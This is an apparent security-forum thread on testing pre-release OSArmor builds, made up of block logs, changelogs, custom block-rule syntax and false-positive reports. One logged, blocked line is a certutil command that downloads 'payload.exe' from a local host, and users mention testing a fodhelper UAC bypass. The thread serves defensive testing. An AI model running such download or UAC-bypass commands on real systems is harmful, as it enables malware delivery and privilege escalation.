NoVirusThanks OSArmor: An Additional Layer of Defense

Also "eventvwr.exe" also presents the self-elevation instruction.

 

I got that one today, too. But I am still on Fall Creators.

 

Date/Time: 10/04/2018 19:20:02
Process: [4496]C:\Windows\System32\MusNotification.exe
Process MD5 Hash: B2DCDF528CF39533643C13FAD72842FC
Parent: [1608]C:\Windows\System32\svchost.exe
Rule: BlockSuspiciousProcesses
Rule Name: Block execution of suspicious processes
Command Line: C:\WINDOWS\system32\MusNotification.exe Display
Signer:
Parent Signer: Microsoft Windows Publisher
User/Domain: SYSTEM/NT AUTHORITY
Integrity Level: System
Parent Integrity Level: System

 

Same

 

Same situation, but no block here (yet)...

 

How can OSA block a bat file without setting a custom-block rule OR without having to tick to block ALL CMD-BAT etc.

What is the exact Custom-Block Rule syntax since i tried to set one yesterday and it just wouldn't take to block a bat file from manual click and launch.

I run a simple a batfile in C:\Users\Username\AppData\Local\Temp and clicking on it launches every time AFTER ERP 4 picks it up and i ALLOW it.

The Lockdown / Experimental is looking good BTW. However in testing i am getting this [Block processes located in suspicious folders] instead of [Block execution of unsigned processes on user space].

 

Here is a new v1.4 (pre-release) test55:
http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test55.exe

*** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

So far this is what's new compared to the previous pre-release:

+ Fixed Block suspicious processes
+ Block "tricks" used to run UAC-bypass system processes
+ Block unsigned processes to run with high privileges
+ Block unsigned processes to run with system privileges
+ Renamed and improved UAC-bypass mitigation rules
+ Renamed Block execution of unsigned processes on Common AppData (\ProgramData\)
+ Readded Block execution of ALL "autoelevate" system processes
+ Fixed some false positives

To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

If you find any false positive or issue please let me know.

Screenshot with new rules:



@Sampei Nihira

Added back "Block execution of ALL "autoelevate" system processes".

Improved some things to reduce FPs.

Do you want them to work also on XP? Actually they only work on Vista+ OS.

@jdd58 @guest @shmu26 @Sampei Nihira @Azure Phoenix

FPs should be fixed now.

@aldist

We'll add save of window size and custom MP3 audio (instead of beep) on next version.

I wrote them on the todo list.

@EASTER

This should work (if the .bat file is executed via double-click, see parent as Explorer.exe):

Code:

[%PROCESS%: *\cmd.exe] [%PROCESSCMDLINE%: *.bat*] [%PARENTPROCESS%: C:\WINDOWS\Explorer.exe]

// Tested:

Code:

Process: [4660]C:\Windows\System32\cmd.exe
Parent: [3012]C:\Windows\explorer.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: cmd /c ""C:\Users\User\Desktop\test.bat" "

To block .bat on \Temp\ folder (without checking Explorer.exe as parent):

Code:

[%PROCESS%: *\cmd.exe] [%PROCESSCMDLINE%: C:\Users\Username\AppData\Local\Temp\*.bat*]

 

Perfecto! Thanks

 

Thank! .wav would be better, since normally all programs for alert sounds use .wav, and the user will be easier to find the right sound and do not have to convert it to .mp3.

 

No,that's okay, thank you.
If I can count on the rule:

"Block any processes executed from mmc.exe"

___________________________________________

I can no longer find the rule below:

"BlockSuspiciousCmdlines"

Date/Time: 06/04/2018 00:50:53
Process: [6084]C:\Windows\System32\certutil.exe
Parent: [6020]C:\Windows\System32\cmd.exe
Rule: BlockSuspiciousCmdlines
Rule Name: Block execution of suspicious command-line strings
Command Line: certutil -urlcache -split -f http://127.0.0.1:80/payload.exe
Signer:
Parent Signer:

What is the rule that blocks Certutil now?
TH.

 

Sampei Nihira

Main Protection -> Block execution of suspicious command-line strings

 

I did this test:

https://homjxi0e.wordpress.com/2018/01/26/uac-bypassing-using-fodhelper-method-regserver/





However, I will enable the ALL "autoelevate" rule.

 

Here is a new v1.4 (pre-release) test56:
http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test56.exe

*** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

So far this is what's new compared to the previous pre-release:

+ Improved showing of main GUI via tray icon -> Show/Hide Window
+ Improved Block suspicious Svchost.exe process behaviors
+ Fixed some false positives

To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

If you find any false positive or issue please let me know.

@Sampei Nihira

Yes, many rules are inside "Block suspicious processes\command-lines"

 

I will be happy when this is released. I am ready for ERP beta to be placed at the forefront.

 

You are as anxious as I am about that.

OSA Armor is solidly so awesome and ERP 4 is equally formidable in it's granularity-features etc.

 

Uploaded a new video, used OSArmor 1.4 (pre-release) build 56 with default settings:

PO0045.2018.doc Exploit Payload Blocked by OSArmor
https://www.youtube.com/watch?v=LcSBZc-BbiI

 

No news about Windows Live Mail?

 

@novirusthanks
Feature suggestion detected This is not important, but using a single click in the system tray instead of a double one would be much more convenient.

 

The Windows 7 hanging problem has not gone away. I thought that it had been cured but after several days of benefitting from the protection of OSArmor, the problem raised its head again. The affected computer is old and slow. I can shed little light except that it feels to me like a race condition is present and happens when this single core processor computer is working very hard. I have no way of communicating evidence to the author about the occurences. Fortunately my equally ancient Windows XP SP3 system runs great with OSArmor so I shall be using it to prolong the usable life of it and continue to run applications not possible on later Windows.

 

@novirusthanks

Interesting research that could be useful for OSA development/testing.
Thanks to Daniel Bohannon.

https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html

 

Something is not working right.
I blocked cmd.exe, but it still launches from Search Everywhere. See screenshot:

 

Add string in Custom Block-Rules:
[%PROCESS%: *\cmd.exe]
Or use Main Protections - Block execution of suspicious processes

 

I tried to duplicate that same bypass but OSA did block and indicate the Rule it arrived from.
This is on my Windows 8.1 only though. Haven't tested that potential issue on Windows 10 and I don't have a 7.
Playing musical O/S's over here. Today is 8.1's turn.

 

@novirusthanks
When the computer turns off or reboots, the GPO policy is triggered and the network adapter is disabled.

With version "test55" it works, with version "test56" it stopped working. There are no any messages. When a reboot is performed with the protection of the OSA disabled, the adapter is disabled, so some OSA rule prevents the normal execution of the policy.
What rule does this do?
PS
When execution this .bat in normal mode, it execute without any messages from the OSA.